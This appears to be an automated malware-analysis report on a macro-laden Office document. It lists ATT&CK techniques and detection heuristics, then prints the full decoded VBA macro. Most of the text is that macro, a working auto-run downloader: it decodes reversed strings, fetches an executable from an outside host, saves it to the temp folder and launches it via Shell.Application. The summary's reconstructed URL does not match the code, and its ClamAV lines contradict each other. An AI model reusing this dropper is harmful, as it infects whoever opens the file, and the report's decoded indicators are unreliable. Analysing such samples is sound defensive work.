Verdict: MALICIOUS (Risk Score 266)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1140 Deobfuscate/Decode Files or Information
The sample contains heavily obfuscated VBA macros, including an AutoOpen subroutine, a common technique for executing malicious code as soon as a document is opened. The script attempts to download a payload from the reconstructed URL 'http://uratilimg.or.sj/nib/exe.fsdGHi' and likely uses the string 'noitacilppa.llehS' (the reversed form of Shell.Application) to execute it. The CreateObject and Environ() calls further support payload execution and possible information gathering.
Heuristics (10)

- ClamAV: Doc.Dropper.Agent-1616871 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1616871
- VBA macros detected (medium, 6 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set NUIHusdfsd = CreateObject(SrpQPF(I7Av))`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set NUIHusdfsd = CreateObject(SrpQPF(I7Av))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `Sub Workbook_Open()`
- Environ() call (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: `pHUIisdf.Open Environ(SrpQPF(U0G5AN6C1IZ)) & SrpQPF(ZCmjC6En6E)`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9498 bytes |

SHA-256: b064ea8189b9adf7fe1412d1a0cf89b69aed6c806876b28b6a8396bcd6c90923

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 62 of 115 identifiers look randomly generated (e.g. 'YuGUCTFJYVPifB'), which is consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const n2EsR = "exe.fsdGHi\"
Private Const QVWdP = "PMET"
Private Const URkPCd0U4a = "exe.nib/sj/or.emoh.uratilimg.www//:ptth"
Private Const ZCmjC6En6E = n2EsR
Private Const U0G5AN6C1IZ = QVWdP
Private Const AK2awpFLc = "noitacilppa.llehS"
Private Const l4qPvk = ""
Private Const VTtsivoEya = "TEG"
Private Const I7Av = "PTTHLMX.2LMXSM"
Sub dsfsdwer()
werwersfdf
Dim LyCcPNHa As Integer
LyCcPNHa = 667
Do While LyCcPNHa < 667 + 10
LyCcPNHa = LyCcPNHa + 1: DoEvents
Loop
Dim uOrwJGp As Integer
uOrwJGp = 1231
Do While uOrwJGp < 1231 + 10
uOrwJGp = uOrwJGp + 1: DoEvents
Loop
End Sub
Sub AutoOpen()
dsfsdwer
Dim EUYbSrUzjfTo As Integer
For EUYbSrUzjfTo = 973 To 973 + 5
DoEvents
Next EUYbSrUzjfTo
Dim uBgssHL As Integer
uBgssHL = 1286
Do While uBgssHL < 1286 + 10
uBgssHL = uBgssHL + 1: DoEvents
Loop
End Sub
Sub Workbook_Open()
dsfsdwer
Dim VRRQUGz As Integer
VRRQUGz = 141
Do While VRRQUGz < 141 + 10
VRRQUGz = VRRQUGz + 1: DoEvents
Loop
Dim UdSyHHGLipw As Integer
For UdSyHHGLipw = 1811 To 1811 + 5
DoEvents
Next UdSyHHGLipw
End Sub
Function FRkfhy(ByVal vWebFile As String, ByVal pNJKBjkdsf As String) As Boolean
Dim dJSAYGtdSR As Long, GYUbjsdf As Long, oJhuidsf() As Byte
Dim rfdQp As Integer
rfdQp = 1636
Do While rfdQp < 1636 + 10
rfdQp = rfdQp + 1: DoEvents
Loop
Dim RfSFgCBd As Integer
For RfSFgCBd = 1319 To 1319 + 5
DoEvents
Next RfSFgCBd
Dim aIwRH As Integer
For aIwRH = 586 To 586 + 5
DoEvents
Next aIwRH
Dim RxGGF As Integer
For RxGGF = 1168 To 1168 + 5
DoEvents
Next RxGGF
Dim sDxPyUEPVRd As Integer
For sDxPyUEPVRd = 1313 To 1313 + 5
DoEvents
Next sDxPyUEPVRd
Dim kCzQsQQ As Integer
For kCzQsQQ = 395 To 395 + 5
DoEvents
Next kCzQsQQ
Set NUIHusdfsd = CreateObject(SrpQPF(I7Av))
Dim EQwQic As Integer
EQwQic = 512
Do While EQwQic < 512 + 10
EQwQic = EQwQic + 1: DoEvents
Loop
Dim YuGUCTFJYVPifB As Integer
YuGUCTFJYVPifB = 2060
Do While YuGUCTFJYVPifB < 2060 + 10
YuGUCTFJYVPifB = YuGUCTFJYVPifB + 1: DoEvents
Loop
NUIHusdfsd.Open SrpQPF(VTtsivoEya), vWebFile, False
Dim bTEmoIlqDA As Integer
For bTEmoIlqDA = 942 To 942 + 5
DoEvents
Next bTEmoIlqDA
Dim iZPdoQVJvQt As Integer
iZPdoQVJvQt = 1413
Do While iZPdoQVJvQt < 1413 + 10
iZPdoQVJvQt = iZPdoQVJvQt + 1: DoEvents
Loop
NUIHusdfsd.Send
Dim pmUiH As Integer
pmUiH = 324
Do While pmUiH < 324 + 10
pmUiH = pmUiH + 1: DoEvents
Loop
Dim zTJAOZHHuh As Integer
zTJAOZHHuh = 2123
Do While zTJAOZHHuh < 2123 + 10
zTJAOZHHuh = zTJAOZHHuh + 1: DoEvents
Loop
Dim HkoCyhv As Integer
For HkoCyhv = 316 To 316 + 5
DoEvents
Next HkoCyhv
Dim hQNcmUUHuU As Integer
hQNcmUUHuU = 371
Do While hQNcmUUHuU < 371 + 10
hQNcmUUHuU = hQNcmUUHuU + 1: DoEvents
Loop
Dim ADGyYm As Integer
For ADGyYm = 1918 To 1918 + 5
DoEvents
Next ADGyYm
Dim mPueaOjaPeo As Integer
mPueaOjaPeo = 1860
Do While mPueaOjaPeo < 1860 + 10
mPueaOjaPeo = mPueaOjaPeo + 1: DoEvents
Loop
Dim UyLKbfhZyNF As Integer
UyLKbfhZyNF = 551
Do While UyLKbfhZyNF < 551 + 10
UyLKbfhZyNF = UyLKbfhZyNF + 1: DoEvents
Loop
Dim bVQUaKDK As Integer
bVQUaKDK = 23
Do While bVQUaKDK < 23 + 10
bVQUaKDK = bVQUaKDK + 1: DoEvents
Loop
oJhuidsf = NUIHusdfsd.responseBody
Dim JSrmOQxRQfUA As Integer
JSrmOQxRQfUA = 461
Do While JSrmOQxRQfUA < 461 + 10
JSrmOQxRQfUA = JSrmOQxRQfUA + 1: DoEvents
Loop
Dim AkuAwIJfgpNu As Integer
For AkuAwIJfgpNu = 977 To 977 + 5
DoEvents
Next AkuAwIJfgpNu
Dim QpmIf As Integer
QpmIf = 336
Do While QpmIf < 336 + 10
QpmIf = QpmIf + 1: DoEvents
Loop
Dim FgpBexcAS As Integer
FgpBexcAS = 83
Do While FgpBexcAS < 83 + 10
FgpBexcAS = FgpBexcAS + 1: DoEvents
Loop
Dim SEIjJUOhe As Integer
SEIjJUOhe = 253
Do While SEIjJUOhe < 253 + 10
SEIjJUOhe = SEIjJUOhe + 1: DoEvents
Loop
Dim SQynHyp As Integer
SQynHyp = 1353
Do While SQynHyp < 1353 + 10
SQynHyp = SQynHyp + 1: DoEvents
Loop
GYUbjsdf = FreeFile
Dim kCQqkaFOPNSD As Integer
For kCQqkaFOPNSD = 1839 To 1839 + 5
DoEvents
Next kCQqkaFOPNSD
Dim pAFCNftBC As Integer
For pAFCNftBC = 2150 To 2150 + 5
DoEvents
Next pAFCNftBC
If Dir(pNJKBjkdsf) <> "" Then Kill pNJKBjkdsf
Dim uLxBbPMGZVt As Integer
For uLxBbPMGZVt = 1955 To 1955 + 5
DoEvents
Next uLxBbPMGZVt
Dim fHMaQFSssT As Integer
fHMaQFSssT = 764
Do While fHMaQFSssT < 764 + 10
fHMaQFSssT = fHMaQFSssT + 1: DoEvents
Loop
Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
Dim orjIlP As Integer
orjIlP = 156
Do While orjIlP < 156 + 10
orjIlP = orjIlP + 1: DoEvents
Loop
Dim txArQ As Integer
For txArQ = 2127 To 2127 + 5
DoEvents
Next txArQ
Put #GYUbjsdf, , oJhuidsf
Dim OGgInYSHcS As Integer
OGgInYSHcS = 2321
Do While OGgInYSHcS < 2321 + 10
OGgInYSHcS = OGgInYSHcS + 1: DoEvents
Loop
Dim JidFHoINV As Integer
JidFHoINV = 100
Do While JidFHoINV < 100 + 10
JidFHoINV = JidFHoINV + 1: DoEvents
Loop
Close #GYUbjsdf
Dim CfvciBJyfaaZ As Integer
For CfvciBJyfaaZ = 443 To 443 + 5
DoEvents
Next CfvciBJyfaaZ
Dim GnHMUKqzz As Integer
For GnHMUKqzz = 2113 To 2113 + 5
DoEvents
Next GnHMUKqzz
Dim RPmVgmiuL As Integer
RPmVgmiuL = 1353
Do While RPmVgmiuL < 1353 + 10
RPmVgmiuL = RPmVgmiuL + 1: DoEvents
Loop
Dim iviUvRQtbse As Integer
iviUvRQtbse = 19
Do While iviUvRQtbse < 19 + 10
iviUvRQtbse = iviUvRQtbse + 1: DoEvents
Loop
Set NUIHusdfsd = Nothing
Dim DrrRbnPjO As Integer
DrrRbnPjO = 915
Do While DrrRbnPjO < 915 + 10
DrrRbnPjO = DrrRbnPjO + 1: DoEvents
Loop
Dim jcMuwQtyLVrE As Integer
For jcMuwQtyLVrE = 2400 To 2400 + 5
DoEvents
Next jcMuwQtyLVrE
Dim pHUIisdf As Object
Dim MPHgJomTIdSJ As Integer
MPHgJomTIdSJ = 301
Do While MPHgJomTIdSJ < 301 + 10
MPHgJomTIdSJ = MPHgJomTIdSJ + 1: DoEvents
Loop
Dim eVvKC As Integer
eVvKC = 1379
Do While eVvKC < 1379 + 10
eVvKC = eVvKC + 1: DoEvents
Loop
Set pHUIisdf = CreateObject(SrpQPF(AK2awpFLc))
Dim dtjme As Integer
dtjme = 330
Do While dtjme < 330 + 10
dtjme = dtjme + 1: DoEvents
Loop
Dim sCYlZ As Integer
For sCYlZ = 317 To 317 + 5
DoEvents
Next sCYlZ
pHUIisdf.Open Environ(SrpQPF(U0G5AN6C1IZ)) & SrpQPF(ZCmjC6En6E)
Dim BaDigNCQNE As Integer
BaDigNCQNE = 1956
Do While BaDigNCQNE < 1956 + 10
BaDigNCQNE = BaDigNCQNE + 1: DoEvents
Loop
Dim xhORmOShr As Integer
For xhORmOShr = 947 To 947 + 5
DoEvents
Next xhORmOShr
End Function
Sub werwersfdf()
Dim qvgnuKl As Integer
For qvgnuKl = 172 To 172 + 5
DoEvents
Next qvgnuKl
Dim hQyBVyC As Integer
hQyBVyC = 2326
Do While hQyBVyC < 2326 + 10
hQyBVyC = hQyBVyC + 1: DoEvents
Loop
HUIBuerwfds = SrpQPF(URkPCd0U4a)
Dim LlNsqYMhYOcn As Integer
LlNsqYMhYOcn = 2253
Do While LlNsqYMhYOcn < 2253 + 10
LlNsqYMhYOcn = LlNsqYMhYOcn + 1: DoEvents
Loop
Dim vQeQDe As Integer
vQeQDe = 108
Do While vQeQDe < 108 + 10
vQeQDe = vQeQDe + 1: DoEvents
Loop
FRkfhy HUIBuerwfds, Environ(SrpQPF(U0G5AN6C1IZ)) & SrpQPF(ZCmjC6En6E)
Dim dTisbbN As Integer
dTisbbN = 778
Do While dTisbbN < 778 + 10
dTisbbN = dTisbbN + 1: DoEvents
Loop
Dim aBYVygx As Integer
aBYVygx = 770
Do While aBYVygx < 770 + 10
aBYVygx = aBYVygx + 1: DoEvents
Loop
Dim hjbAdHF As Integer
For hjbAdHF = 345 To 345 + 5
DoEvents
Next hjbAdHF
Dim vowanmCGIA As Integer
vowanmCGIA = 1191
Do While vowanmCGIA < 1191 + 10
vowanmCGIA = vowanmCGIA + 1: DoEvents
Loop
End Sub
Function SrpQPF(sstring As String) As String
Dim aKRZpPPfUYPo As Integer
aKRZpPPfUYPo = 117
Do While aKRZpPPfUYPo < 117 + 10
aKRZpPPfUYPo = aKRZpPPfUYPo + 1: DoEvents
Loop
Dim JSdYBQjDQQ As Integer
For JSdYBQjDQQ = 1407 To 1407 + 5
DoEvents
Next JSdYBQjDQQ
Dim WF5OIEHGvMF As Long
Dim eEPJcLiRd As Integer
For eEPJcLiRd = 647 To 647 + 5
DoEvents
Next eEPJcLiRd
Dim osRFDxPMj As Integer
For osRFDxPMj = 2134 To 2134 + 5
DoEvents
Next osRFDxPMj
For WF5OIEHGvMF = 0 To Len(sstring) - 1
Dim yjQSnPUifN As Integer
For yjQSnPUifN = 1763 To 1763 + 5
DoEvents
Next yjQSnPUifN
Dim ilogEiMxshB As Integer
For ilogEiMxshB = 137 To 137 + 5
DoEvents
Next ilogEiMxshB
If Len(sstring) > 0 Then
Dim SqwEivuKOQI As Integer
SqwEivuKOQI = 1663
Do While SqwEivuKOQI < 1663 + 10
SqwEivuKOQI = SqwEivuKOQI + 1: DoEvents
Loop
Dim LELqQ As Integer
LELqQ = 1374
Do While LELqQ < 1374 + 10
LELqQ = LELqQ + 1: DoEvents
Loop
SrpQPF = SrpQPF & Right(sstring, 1)
Dim GeZCDkEJ As Integer
GeZCDkEJ = 1490
Do While GeZCDkEJ < 1490 + 10
GeZCDkEJ = GeZCDkEJ + 1: DoEvents
Loop
Dim OyIOKQo As Integer
For OyIOKQo = 861 To 861 + 5
DoEvents
Next OyIOKQo
sstring = Left(sstring, Len(sstring) - 1)
Dim gHedEmDp As Integer
gHedEmDp = 1946
Do While gHedEmDp < 1946 + 10
gHedEmDp = gHedEmDp + 1: DoEvents
Loop
Dim IQeFaE As Integer
For IQeFaE = 1438 To 1438 + 5
DoEvents
Next IQeFaE
End If
Dim FeVReu As Integer
FeVReu = 1380
Do While FeVReu < 1380 + 10
FeVReu = FeVReu + 1: DoEvents
Loop
Dim IbYvfpvrDTU As Integer
IbYvfpvrDTU = 1687
Do While IbYvfpvrDTU < 1687 + 10
IbYvfpvrDTU = IbYvfpvrDTU + 1: DoEvents
Loop
Next WF5OIEHGvMF
Dim vQEVHLmM As Integer
For vQEVHLmM = 2358 To 2358 + 5
DoEvents
Next vQEVHLmM
Dim iBhFQjQUOh As Integer
For iBhFQjQUOh = 1573 To 1573 + 5
DoEvents
Next iBhFQjQUOh
End Function